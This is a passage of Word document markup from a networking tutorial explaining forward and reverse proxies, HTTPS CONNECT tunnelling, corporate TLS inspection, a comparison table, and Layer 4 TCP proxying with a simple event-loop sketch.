    <w:p w14:paraId="19CE4BBB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy establishes a TCP connection to example.com:443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3BFFE8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy responds to client: HTTP/1.1 200 Connection Established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD518E3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client now performs TLS handshake THROUGH the proxy tunnel (the proxy just forwards raw bytes in both directions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C287962" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy can see the destination (from the CONNECT request) but NOT the content (encrypted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C571EE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why corporate proxies that inspect HTTPS must install their own root CA on client machines</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — they terminate the client's TLS at the proxy, inspect, then create a new TLS connection to the server (essentially a MITM by design).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB07C52" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases for forward proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E2CDA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Corporate internet access control:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Block access to specific websites/categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442BA9F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymization:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Hide the client's real IP from the server (VPNs, Tor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A238167" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching at the client side:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Cache frequently accessed content for multiple clients (reduce bandwidth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F283A1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Content filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Block malware downloads, enforce compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A4160" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access to geo-restricted content:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proxy in another country makes the server think you're local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAEDB8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Reverse Proxy (Server-Side Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E909F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acts on behalf of the SERVER.</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The server deploys the proxy in front of itself. The client doesn't know a proxy is involved — it thinks it's talking directly to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F0971" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6659FA2F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Client] ──────&gt; [Reverse Proxy] ──knows──&gt; [Backend Servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFB784" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                  (server's agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FFFA5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F3BB9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS for example.com resolves to the reverse proxy's IP (not the backend servers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB31FCB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client connects to the proxy thinking it's the real server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D784B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends a normal request: GET /page HTTP/1.1; Host: example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A3AE3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy receives the request, applies logic (routing rules, caching, auth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62820655" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy selects a backend server and forwards the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139CBFD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend responds to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11536BF9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy forwards the response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861F8BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client never knows backend servers exist (they're hidden behind the proxy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719036DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases for reverse proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44958BB6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Distribute traffic across backend servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D8D46" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS termination:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Handle encryption/decryption centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C18D32" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Cache responses to reduce backend load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C529E0A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Hide backend topology, provide WAF, DDoS protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885CE89" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Compress responses before sending to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10511CA3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL rewriting:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Transform request paths before reaching backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C45BE7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API gateway:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Authentication, rate limiting, request transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120679B9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Key Differences Summarized</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020"/>
        <w:gridCol w:w="3747"/>
        <w:gridCol w:w="3583"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="5FCDFEE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7868A7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Aspect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539C38" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Forward Proxy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9CEA1C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reverse Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="0E29E37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B7B4E2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Deployed by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A33651" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client/organization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6790C6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server/service owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="55980C0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08C092" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Protects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D0878C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client's identity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ECA58F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server's identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="2E21E09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137344" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client awareness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39CD0D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client KNOWS about the proxy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7C1AED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client DOESN'T know about the proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1A1365B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B11F26" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server awareness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04D409" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server DOESN'T know about the proxy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47584E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server KNOWS about the proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="0104E01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317B29" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Typical location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4ECCC2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client's network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11E181" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Server's network/edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1F04FEA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159E1C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Scale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5F6426" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Hundreds of clients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91F230" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Thousands to millions of clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DA9C64D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="7BD777F0">
          <v:rect id="_x0000_i3318" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="152940F5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. How Proxy Servers Work at the Network Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AADA755" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 TCP-Level Proxying (Layer 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F947CA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043D70A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client establishes TCP connection to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D7F7C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy establishes a SEPARATE TCP connection to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1630A49F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy copies bytes between the two connections (bidirectionally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632822CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>No protocol awareness — just raw byte forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC17C6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8BFB9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A01046" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client ←TCP Connection 1→ Proxy ←TCP Connection 2→ Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D0EC5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">         (fd_client)                (fd_backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C5E07" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy's event loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C010CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5175A4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>while true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B075F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    if fd_client has data ready → read from fd_client, write to fd_backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6857A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    if fd_backend has data ready → read from fd_backend, write to fd_client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B7B7A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    if either connection closes → close both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6CCF36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5626EE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Splice/sendfile:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Zero-copy data transfer between sockets. Data moves directly from one kernel buffer to another without copying to userspace. Linux's splice() system call enables this.</w:t>
      </w:r>
    </w:p>
